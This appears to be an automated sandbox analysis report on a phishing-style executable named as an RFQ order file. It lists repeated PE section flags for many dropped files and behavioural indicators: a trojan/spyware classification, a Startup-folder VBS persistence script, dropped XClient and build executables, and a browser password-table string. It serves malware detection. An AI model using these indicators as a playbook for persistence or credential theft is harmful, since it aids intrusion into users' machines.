Source: jp2launcher.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: exhilaratingly.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MavInject32.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevated_tracing_service.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@34/171@48/16

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_0046A06A GetLastError,FormatMessageW,

0_2_0046A06A

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,		0_2_004581CB
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004587E1

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0046B333

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0047EE0D

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0046C397

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00404E89

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_02FACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_02FACBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

File created: C:\Users\user\AppData\Roaming\d225894719a6adcd.bin

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8088
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3900:120:WilError_03
Source: C:\Windows\System32\alg.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-d225894719a6adcd9ea72c54-b
Source: C:\Users\user\AppData\Roaming\XClient.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-d225894719a6adcd-inf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4012:120:WilError_03
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-d225894719a6adcdef280244-b
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\XoFHv1TT4hWErxRo

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

File created: C:\Users\user\AppData\Local\Temp\aut1387.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exhilaratingly.vbs"

Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: build.exe, 00000006.00000002.1724819529.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002F14000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Virustotal: Detection: 74%
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	ReversingLabs: Detection: 83%

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

